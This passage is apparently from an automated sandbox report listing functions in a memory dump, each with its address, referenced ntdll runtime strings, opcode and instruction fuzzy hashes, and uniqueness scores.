Download Yara Rule

Strings

*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 00AEBE0F

Memory Dump Source

Source File: 00000001.00000002.288306142.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true

Similarity

API ID:
String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
API String ID: 0-865735534
Opcode ID: 8cdbf59b7585f55da945324a68df03574bded1d714b0e8ef97a52379b5b5f458
Instruction ID: 3df243a0ad8e92c1cc49e080991b871545cad93bd0dc2f08aa0af4d2858c88e2
Opcode Fuzzy Hash: 8cdbf59b7585f55da945324a68df03574bded1d714b0e8ef97a52379b5b5f458
Instruction Fuzzy Hash: A2A11531B006498FDB29DFAAC8547BAB3B4AF49724F144579E846CB6D1DB34DC41CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A72D8A, Relevance: 1.4, Strings: 1, Instructions: 191COMMON

Download Yara Rule

Strings

RTL: Re-Waiting, xrefs: 00ACFA4A

Memory Dump Source

Source File: 00000001.00000002.288306142.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true

Similarity

API ID:
String ID: RTL: Re-Waiting
API String ID: 0-316354757
Opcode ID: e98381e94acc5df5f8c182d4f839b53922c50babd049344049168e6195f2abf7
Instruction ID: 682a374b6307affdaad788954435b9275bfec5e7f090eb3132fba3d6363fe1df
Opcode Fuzzy Hash: e98381e94acc5df5f8c182d4f839b53922c50babd049344049168e6195f2abf7
Instruction Fuzzy Hash: 60613231A00604AFDB31DF68CC80B7EBBF6EB45754F2586B9E819A72C2CB749D418791

Uniqueness

Uniqueness Score: -1.00%

Function 00B40EA5, Relevance: 1.4, Strings: 1, Instructions: 153COMMON

Download Yara Rule

Strings

`, xrefs: 00B40F16

Memory Dump Source

Source File: 00000001.00000002.288306142.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: ebe138bff37a0f56916c8f0577a5f9c25aabf2002adc4228f68fd9c287b179ce
Instruction ID: 85cd984d7a0e02fd9e47ef38ddf6e5715cbdb5b1c4caae3133f88ecdd0279d85
Opcode Fuzzy Hash: ebe138bff37a0f56916c8f0577a5f9c25aabf2002adc4228f68fd9c287b179ce
Instruction Fuzzy Hash: FE51F2702043429FD724DF28D881B2BB7E5EBC4304F140AACF98697291D770EE89DB62

Uniqueness

Uniqueness Score: -1.00%

Function 00AAF0BF, Relevance: 1.4, Strings: 1, Instructions: 137COMMON

Download Yara Rule

Strings

@, xrefs: 00AAF124

Memory Dump Source

Source File: 00000001.00000002.288306142.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction ID: 2d8620f6b8b56d061e32d21498186c294f822195dc28f2156f5809f74b13d1c2
Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction Fuzzy Hash: 44518D716047109FC321DF59C841A6BB7F8FF48750F108A2EFA9587691E7B4E914CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00AF3540, Relevance: 1.4, Strings: 1, Instructions: 130COMMON

Download Yara Rule

Strings

BinaryHash, xrefs: 00AF358F

Memory Dump Source

Source File: 00000001.00000002.288306142.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true

Similarity

API ID:
String ID: BinaryHash
API String ID: 0-2202222882
Opcode ID: 369df44f53cf8ff687555fa4fee7194f590a9caf88ae5b8f813f8332a5dd119a
Instruction ID: de2d8de29bfedccdb94a5f1953ebc67f49c1da44b195953162851330e7a86d22
Opcode Fuzzy Hash: 369df44f53cf8ff687555fa4fee7194f590a9caf88ae5b8f813f8332a5dd119a
Instruction Fuzzy Hash: 884114B2D0152CAADF21DA94CD81FEEB77CAB44754F0045A5BB09AB241DB709F888F94

Uniqueness

Uniqueness Score: -1.00%

Function 00B405AC, Relevance: 1.4, Strings: 1, Instructions: 115COMMON

Download Yara Rule

Strings

`, xrefs: 00B40633

Memory Dump Source

Source File: 00000001.00000002.288306142.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction ID: 28171e45d701a26f3cb5b354d877ee80d08c6301a5a938649a003f795b5c3dc8
Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction Fuzzy Hash: 003111323143156BE720EE24CD85F9B77E9EF84754F044268FA49AB281D670EE14CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00AF3884, Relevance: 1.3, Strings: 1, Instructions: 95COMMON

Download Yara Rule

Strings

BinaryName, xrefs: 00AF38B4

Memory Dump Source

Source File: 00000001.00000002.288306142.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true

Similarity

API ID:
String ID: BinaryName
API String ID: 0-215506332
Opcode ID: f30ba2196bbdeb0b2c12e3e730a804cb987c30c0074d478c8186d9af1b08ffd2
Instruction ID: f816348bef44243dd46b8e400cf922de3207b3f10a1f3d51ce9571bfb763d0af
Opcode Fuzzy Hash: f30ba2196bbdeb0b2c12e3e730a804cb987c30c0074d478c8186d9af1b08ffd2
Instruction Fuzzy Hash: A631E03390151DAFEF15DB99C995E7BB7B8EB80B20F118169BA14A7240D7B09F00CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00AAD294, Relevance: 1.3, Strings: 1, Instructions: 93COMMON

Download Yara Rule

Strings

@, xrefs: 00AAD303

Memory Dump Source

Source File: 00000001.00000002.288306142.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 6717511db7d4619dd74e7b292baa2681f53034cd11c4e0be7a5a7718478723bf
Instruction ID: 35b7abab642f3dad612771ee18dfd3a940ad161155616067afa8b46a751b5182
Opcode Fuzzy Hash: 6717511db7d4619dd74e7b292baa2681f53034cd11c4e0be7a5a7718478723bf
Instruction Fuzzy Hash: EE31ADB55083049FCB10DF28C9819ABBBE8EB86754F10092EF9D697691D734DD04CBA3

Uniqueness

Uniqueness Score: -1.00%

Function 00A81B8F, Relevance: 1.3, Strings: 1, Instructions: 86COMMON

Download Yara Rule

Strings

WindowsExcludedProcs, xrefs: 00A81BC5

Memory Dump Source

Source File: 00000001.00000002.288306142.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true

Similarity

API ID:
String ID: WindowsExcludedProcs
API String ID: 0-3583428290
Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction ID: 0e1819354de40e969cd2c47b383b91f712c42c579462e43118af2636cc59b09b
Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction Fuzzy Hash: 042107B7A40228ABDB21AB59C940F9FB7BDEF45751F154426FD05DB200D634DC02D7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00A9F716, Relevance: 1.3, Strings: 1, Instructions: 71COMMON

Download Yara Rule

Strings

Actx , xrefs: 00A9F73F

Memory Dump Source

Source File: 00000001.00000002.288306142.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true

Similarity

API ID:
String ID: Actx
API String ID: 0-89312691
Opcode ID: 2ea7b855b5200c38efbb91e50b8b021d10e4bbd91f93475fecc319fbc33b5552
Instruction ID: 15aad2eb2dfc31b894b82fcb906f8940229eb3feab0afda7e7f0e4cb49ed2f5c
Opcode Fuzzy Hash: 2ea7b855b5200c38efbb91e50b8b021d10e4bbd91f93475fecc319fbc33b5552
Instruction Fuzzy Hash: 1911C139B087028FEF244F9D889073672EAEB96724F34453AE862CB391DB70CC408381

Uniqueness

Uniqueness Score: -1.00%

Function 00B28DF1, Relevance: 1.3, Strings: 1, Instructions: 45COMMON

Download Yara Rule

Strings

Critical error detected %lx, xrefs: 00B28E21

Memory Dump Source

Source File: 00000001.00000002.288306142.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true

Similarity

API ID:
String ID: Critical error detected %lx
API String ID: 0-802127002
Opcode ID: 95f7256073276ec3ff1b86afc9d0bc7ac158c8aff8c94e6577ae4fb52b075f5a
Instruction ID: 3e0c88d89825bd94ec2bb348cab7f25a7bd0a1424d33dd5b27b9ec0e18b4a163
Opcode Fuzzy Hash: 95f7256073276ec3ff1b86afc9d0bc7ac158c8aff8c94e6577ae4fb52b075f5a
Instruction Fuzzy Hash: E3115B71D15348DADF24DFA89506B9DBBF0FB04314F2542ADE4696B292C7740A01CF14

Uniqueness

Uniqueness Score: -1.00%

Function 00B0FF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON

Download Yara Rule

Strings

NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 00B0FF60

Memory Dump Source

Source File: 00000001.00000002.288306142.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true

Similarity

API ID:
String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
API String ID: 0-1911121157
Opcode ID: db742c8b1620e47a224ce2206f05384975073957714ef7a7c293e0b849c29100
Instruction ID: a743ea8855134ec298627aa28f677fb32d50a819cb00f877cddaf4df864f6c83
Opcode Fuzzy Hash: db742c8b1620e47a224ce2206f05384975073957714ef7a7c293e0b849c29100
Instruction Fuzzy Hash: 4511E171A11545EFCB21DB54C949FA8BBF1FB05704F1580A4F105676E2CB799940CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00B45BA5, Relevance: .6, Instructions: 592COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.288306142.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01a02db13a7205e4fd86935c08c09e3a1e6bbdac6297485d8cb82f34233c1a1f
Instruction ID: 00f30bf317e1632988534196b62ec7674563b265f3854a1db41e08af5f81d4d1
Opcode Fuzzy Hash: 01a02db13a7205e4fd86935c08c09e3a1e6bbdac6297485d8cb82f34233c1a1f
Instruction Fuzzy Hash: AD424871A00669CFDB24CF68C881BA9B7F1FF49304F1481EAD84DAB242E7749A85DF51

Uniqueness

Uniqueness Score: -1.00%

Function 00A94120, Relevance: .4, Instructions: 444COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.288306142.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 432543161fb5bd7ad5344a5386deeead8a2df9bd5b37dfb876b23a8dc855b823
Instruction ID: 15f3d007bc9d428dbfc8293142e262ede7eb93a3756d9c8f0372f07d0a2111e8
Opcode Fuzzy Hash: 432543161fb5bd7ad5344a5386deeead8a2df9bd5b37dfb876b23a8dc855b823
Instruction Fuzzy Hash: 84F16B706082118BCB28DF69C480A7AB7F1BF98704F15492EF886CB391E734DD96DB52

Uniqueness

Uniqueness Score: -1.00%

Function 00AA20A0, Relevance: .4, Instructions: 420COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.288306142.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b52a3a0e93fd6dc4dc67f6940a6dcb7edcfb3927d0444124a136e31881f1992c
Instruction ID: acaf43428d5902c4e38cd08da2c15980baf068af6913f108c428a3427168889b
Opcode Fuzzy Hash: b52a3a0e93fd6dc4dc67f6940a6dcb7edcfb3927d0444124a136e31881f1992c
Instruction Fuzzy Hash: C5F12331A087819FDB25CF2DC9407AA77E1AF96328F14862DF8958B2D1D738DC54CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00A8849B, Relevance: .3, Instructions: 290COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.288306142.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46ea59187e75ff410550dd2cc378483cc434cefa23626c4254fc5acb5c987cea
Instruction ID: 879c90e157bbdc77f5fe04a03091e22342ae8536c466a8d0e7cff8faa6127013
Opcode Fuzzy Hash: 46ea59187e75ff410550dd2cc378483cc434cefa23626c4254fc5acb5c987cea
Instruction Fuzzy Hash: E6B15B71E04219DFDB14EFE8C984AAEBBB5BF48304F64412AE406AB356DF74AD41CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00AA513A, Relevance: .3, Instructions: 258COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.288306142.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9891178cd6e73ee8b6414eccdb48168265a888c4dafc598f84a854f26be8997
Instruction ID: fbc3af19f5e04ee4f77d75652c9e86bfbb7b54797705a51b7490414105fb40a7
Opcode Fuzzy Hash: b9891178cd6e73ee8b6414eccdb48168265a888c4dafc598f84a854f26be8997
Instruction Fuzzy Hash: F4C112756087808FD354CF29C580A6AFBF1BF89304F184A6EF8998B392D771E945CB46

Uniqueness

Uniqueness Score: -1.00%

Function 00AA03E2, Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.288306142.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54ec2b9930b135c2a26f5874af98028d5397244ab105ec678137cff7dbc49cbf
Instruction ID: 63cb52461b2418f73190ffe85adbc63e0c6eb62d51230dfb62c43ac2546fa7c3
Opcode Fuzzy Hash: 54ec2b9930b135c2a26f5874af98028d5397244ab105ec678137cff7dbc49cbf
Instruction Fuzzy Hash: BE913731E04255AFEB219B69CC44FBD7BB8BF0A724F150261FA10AB2D1DB749C40CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00A7C600, Relevance: .2, Instructions: 225COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.288306142.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d31ccb8fe892320db14f9f52d2a2ba5b99a6ab5648afdf25d1b89e3c16b8f91d
Instruction ID: b8839760433c86cefe058d21560238120dac1c27e6cb514fa8cf15547cbebf74
Opcode Fuzzy Hash: d31ccb8fe892320db14f9f52d2a2ba5b99a6ab5648afdf25d1b89e3c16b8f91d
Instruction Fuzzy Hash: 08817E756482819FDB25CF16C891A7FB3E9EF84390F24486AFD469B241D730ED41CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00B0B8D0, Relevance: .2, Instructions: 199COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.288306142.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f161e14832f07a9fc6710d4cf3bf8a8d730c2db9db0c84eb1aa3f01e8864493
Instruction ID: b5412397b222636760de936ade3fa17915b3329f2b6257472e602605378a0018
Opcode Fuzzy Hash: 4f161e14832f07a9fc6710d4cf3bf8a8d730c2db9db0c84eb1aa3f01e8864493
Instruction Fuzzy Hash: 11710F32240701AFDB31CF24CD86F66BBE5EF44720F2489A8E6558B2E1DB75E944CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00AF6DC9, Relevance: .2, Instructions: 199COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.288306142.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
Instruction ID: edc9a3b0bc131af0988860b23ab21125e7e69b51379e31ad0a4ac80cec4f2f2a
Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
Instruction Fuzzy Hash: E1715971A00619AFCB10DFA9CA85AEEBBF9FF48710F104169F605E7251DB34AA41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00A752A5, Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.288306142.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c59a1076c7541f0092afd3aa208331862e770bf48dc38c61a72d359be96b65d3
Instruction ID: 7e074a202f1a8fde4220690e2e9bef101591de2ffe543273e45526ecc4cc84c0
Opcode Fuzzy Hash: c59a1076c7541f0092afd3aa208331862e770bf48dc38c61a72d359be96b65d3
Instruction Fuzzy Hash: BA51DF31245741ABC721EF68CD46B67B7E8FF54710F20891EF49987692EBB4E804C791

Uniqueness

Uniqueness Score: -1.00%

Function 00AA2AE4, Relevance: .2, Instructions: 159COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.288306142.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33ad50f07d2adcaf874745f81ce0002b79d0b2a56df471bda6f7c382c8f3d1ed
Instruction ID: c82d9d31027d3c3886eb59ea1b926abdab4c81079fadf09b21a39e942b86c846
Opcode Fuzzy Hash: 33ad50f07d2adcaf874745f81ce0002b79d0b2a56df471bda6f7c382c8f3d1ed
Instruction Fuzzy Hash: 2C51D476B00115CFCB18CF1DC890ABDB7B1FB89700715855AE8469B3A4DB34AE61DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B3AE44, Relevance: .2, Instructions: 152COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.288306142.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3901f2dc4a20297eea77e82b190a7609857137bdbfd32c0fb9955dfae231715d
Instruction ID: c6314c77af526997aae6346edf60e51427ce2ce29f68b298ac3a6cd1d1b4e34a
Opcode Fuzzy Hash: 3901f2dc4a20297eea77e82b190a7609857137bdbfd32c0fb9955dfae231715d
Instruction Fuzzy Hash: 6441D1B1704211ABC726DB29C895B7BB7DAEF84720F348399F896C7290DB34DC01C692

Uniqueness

Uniqueness Score: -1.00%

Function 00A9DBE9, Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.288306142.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4cc6e5dd27c3533ce74ac7508e953c439c8ae00633a3e90b689defc9e0319385
Instruction ID: 656b72cc214ff3242ff2920b4eabfc65e7518ce5082259094b6a023d9c4b4a8d
Opcode Fuzzy Hash: 4cc6e5dd27c3533ce74ac7508e953c439c8ae00633a3e90b689defc9e0319385
Instruction Fuzzy Hash: 0F51AC75B01205DFCF14CFA8C590AAEBBF1BF48350F20856AD959AB340DB71AE84CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00A8EF40, Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.288306142.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
Instruction ID: ea664827a7470413d355530dab92010da9429056f316d3989da8f506abc4da48
Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
Instruction Fuzzy Hash: C9512230E0424ADFDB20EB68C1C07AEBBF1AF55314F2881B9D54597382E376AD89D791

Uniqueness

Uniqueness Score: -1.00%

Function 00B4740D, Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.288306142.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
Instruction ID: 098fd1e610b120a3834ee0f894194a82775d9f7358994bb444f79999b86c9740
Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
Instruction Fuzzy Hash: 37517A71640606EFCB15CF14C981A96BBF5FF55304F1580AAE908DF212E771EA46DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00AA2990, Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.288306142.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39f733e288eda4cba1cb9678e6df2024075a4be15241299dffeae95e1a332e59
Instruction ID: cd2c14b426a997a1d3d7a315728183f19a459e25167f22028f0d3467f251f26d
Opcode Fuzzy Hash: 39f733e288eda4cba1cb9678e6df2024075a4be15241299dffeae95e1a332e59
Instruction Fuzzy Hash: 55518971900209EFDF25DF59C980AEEBBB5BF49354F108055F805AB2A1D3319D62DF90

Uniqueness

Uniqueness Score: -1.00%

Function 00AA4BAD, Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.288306142.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0012f3bd9576924a2ac0097e68d644f95f07e5ffd9e2de6735ae43e949d1dc54
Instruction ID: 4b0551fede959a29e68d3a176c0e6e393ff220217695b87fdb0fb35f6692e0bf
Opcode Fuzzy Hash: 0012f3bd9576924a2ac0097e68d644f95f07e5ffd9e2de6735ae43e949d1dc54
Instruction Fuzzy Hash: D741A235A012689FCB21DF65C941BEE77B8EF5A750F0104A9F90CAB281DB74DE84CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00AA4D3B, Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.288306142.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9abefa2c187c117e382c0bbe96265cf47a013c97b1ca248d55fe077e91ae88d0
Instruction ID: 2b229d70e24f8509955032a69d46db53f81b3a5b7fab2530934b94354d52254a
Opcode Fuzzy Hash: 9abefa2c187c117e382c0bbe96265cf47a013c97b1ca248d55fe077e91ae88d0
Instruction Fuzzy Hash: 0C41C171A40318AEEB319F14CD81BAAB7A9FB99710F1440A9F849972C1DBB4ED40CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00A88A0A, Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.288306142.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93c7a901e2cce084e218f9a19768ce645a9e39eca71052b085c5b4405882b783
Instruction ID: b4a208be0bd99722f84842d06271f33465f8884a05ac51c6f981776913370002
Opcode Fuzzy Hash: 93c7a901e2cce084e218f9a19768ce645a9e39eca71052b085c5b4405882b783
Instruction Fuzzy Hash: 574183B0A0022C9BDB24EF55CC88AA9B7F4FF94340F5145EAE81997242EF749E80CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00B3AA16, Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.288306142.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
Instruction ID: 71cb4aac7dbf952717e113e69b3b2fb0497ee9255f8dd9d88c8582ed8fe3609a
Opcode Fuzzy Hash: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
Instruction Fuzzy Hash: 5131D332B001146BDF15DB69C885BAFF7EAEF84310F3580A9E885A7251EB749D40C651

Uniqueness

Uniqueness Score: -1.00%

Function 00B3FDE2, Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.288306142.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
Instruction ID: 86ce689231f558bb1b1c226ca4698c67f65fecd64d36f49a6a263720b84588ca
Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
Instruction Fuzzy Hash: D131F632B046426FD7229B68C885F7ABBEAEB85750F3844F8F8458B752DA74DC41C720

Uniqueness

Uniqueness Score: -1.00%

Function 00B3EA55, Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.288306142.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
Instruction ID: ffced2ab02df17050f9277ec3a4398bf0788ab99db3a62ce3b361c61b922da7e
Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
Instruction Fuzzy Hash: 9F31A376604705ABC719DF24C981A6BB7E9FFC0310F14496EF56687685EF30E805CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00AF69A6, Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.288306142.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f554cad42dfd62766728bf1992800525b1822f9b6a6eec27efddd263a95f7e35
Instruction ID: 889903e2390e6bca505c5bd8db8cf9ac757621c07d59fc218e56c0bad67e432b
Opcode Fuzzy Hash: f554cad42dfd62766728bf1992800525b1822f9b6a6eec27efddd263a95f7e35
Instruction Fuzzy Hash: 9C4179B1D0020CAFDB20DFA5D941BFEBBF8EF48714F14812AEA54A7251EB749905CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00A75210, Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.288306142.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e26c4db48ac9096e60494d3ad6edb770db6b69118dd003d236a80f3048a67e65
Instruction ID: 4ed976e3fe6a1801d46169515b5598ca82b3b8b6b1fdc96ae5b53d5908493bfa
Opcode Fuzzy Hash: e26c4db48ac9096e60494d3ad6edb770db6b69118dd003d236a80f3048a67e65
Instruction Fuzzy Hash: 9731F631651A10EBC726AB68CD45FA677B6FF10760F21C61BF45A5B2A2DB70EC00C6D0

Uniqueness

Uniqueness Score: -1.00%

Function 00AB3D43, Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.288306142.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a3137ee9d25889260cb03841498bbe46218d313b01f307427d4f4b23db3ea77
Instruction ID: 05ee41f697437c6f4f78bb3ae1a24d9529f9cd01814c7b7de15b7eb1ee0f88a7
Opcode Fuzzy Hash: 5a3137ee9d25889260cb03841498bbe46218d313b01f307427d4f4b23db3ea77
Instruction Fuzzy Hash: C5319E32605655DBCB25CF2AC841ABABBF9FF55700B15846AE84ACB352E730DD40D790

Uniqueness

Uniqueness Score: -1.00%

Function 00AAA61C, Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.288306142.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17ab2f258ae1e61df7042421239c1f34cb68920ca86a00e53f1ffba872f7fba4
Instruction ID: 6e0b58de81f4c762e6706ef2d7d773d3b64f1b67c319d9352a4d0acb095f34be
Opcode Fuzzy Hash: 17ab2f258ae1e61df7042421239c1f34cb68920ca86a00e53f1ffba872f7fba4
Instruction Fuzzy Hash: 084188B5A00315DFCB15CF59D890B9ABBF1BB5A304F1980A9E805AF391C778AD01CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00AF7016, Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.288306142.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 524c87da2eff3d2e7b65bbd6520d83a1d0f113c58c87c9646a2c298dc41205a7
Instruction ID: ba6b52727384e9ccf39067ef0439e30bc287db24967d01ff16c28cbb9054b81b
Opcode Fuzzy Hash: 524c87da2eff3d2e7b65bbd6520d83a1d0f113c58c87c9646a2c298dc41205a7
Instruction Fuzzy Hash: 6731A2726087559BC320DF68C941A7AB3E9BF88700F044A29F99587691EB30ED04C7A5

Uniqueness

Uniqueness Score: -1.00%

Function 00A9C182, Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.288306142.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
